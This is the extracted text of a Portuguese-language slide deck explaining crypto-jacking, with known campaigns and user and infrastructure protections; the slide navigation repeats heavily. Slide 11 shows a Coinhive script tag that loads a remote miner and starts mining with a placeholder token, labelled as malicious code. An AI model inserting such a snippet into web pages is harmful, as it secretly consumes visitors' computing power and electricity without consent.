  • 6. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e., sem consentimento e conhecimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 7. Cryptocurrency - The Inception [1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete" https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf [2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/ Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 8. Cryptocurrency - The Inception Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 9. Cryptocurrency - The Inception Criptomoedas tornaram-se uma nova tendência ● Bitcoin ● Ether ● Litecoin ● NEM ● Monero Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 10. Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “in-the-wild” Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 11. Crypto-jacking em Páginas Web Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção <script src=”https://coin-hive.com/lib/coinhive.min.js“></script> <script> var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID miner.start(); </script> Código malicioso de mineração Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 12. Crypto-jacking em redes Wi-Fi Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 13. Crypto-jacking “ In-the-Wild “ Para todo o tipo de gostos :) ● SQL Injection ● XSS + Social Engineering ● Malware ○ Dofoil (infetou mais de 500.000 computadores Windows) ○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas) ○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud ○ Plugins CMS infetados (Browsealoud, etc.) ■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7) ○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB, Archive Poster - extensão Google Chrome) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 14. Anúncios versus Crypto-mining jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Motivação - Obter dinheiro fácil através da capacidade de processamento e eletricidade de terceiros (crypto-mining => jacking Crypto-mining jacking Problemas: - Pouco retorno (1k visits - 55 sec - €0.36) - Desempenho (website, browser, PC, Internet) - Notificação prévia + consentimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 15. Proteção Ponto de vista: Utilizador ● Opera lançou módulo nativo ● Extensão Chrome: NoCoin ● AV ● Consciencialização (estar alerta) + Ação (notificar) Infraestrutura ● Monitorização (IDS, WAFs, etc) ● Cibersegurança contínua ● Auditorias de segurança ● Consciencialização + Ação Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 16. ~ «O meu grande bem-haja a todos» ~ Pedro Tavares <sirpedrotavares@gmail.com>